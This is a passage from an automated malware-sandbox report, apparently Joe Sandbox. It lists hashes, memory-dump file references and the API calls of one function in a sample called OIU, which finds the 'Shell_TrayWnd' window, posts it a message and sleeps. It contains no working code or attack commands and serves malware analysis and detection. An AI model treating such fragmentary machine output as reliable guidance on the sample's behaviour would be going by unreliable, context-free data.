                                                                      • Opcode ID: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
                                                                      • Instruction ID: b9a5f651eb69dffafe87c400f04e90e2724db9ab1dfbe699f25054df89c3ee5a
                                                                      • Opcode Fuzzy Hash: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
                                                                      • Instruction Fuzzy Hash: 5BD0C9323D53107AE664A771AC8FFCE76149B05B10F0049167745BA1D0C9A0A841DB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C32322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindWindowW.USER32 ref: 00C3232C
                                                                      • PostMessageW.USER32 ref: 00C3233F
                                                                        • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 1a78efdd52cefcc43d6ac2f82a909c1db27113e250340b4ce72f5ef73e865d0d
                                                                      • Instruction ID: 9ce6da295f598b66a6f4c871d70598bb01ab8ef8654c614993856eb377c0622f
                                                                      • Opcode Fuzzy Hash: 1a78efdd52cefcc43d6ac2f82a909c1db27113e250340b4ce72f5ef73e865d0d
                                                                      • Instruction Fuzzy Hash: 6FD0C9363A4310B6E664A771AC8FFCE7A149B00B10F0049167745BA1D0C9A0A841DB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%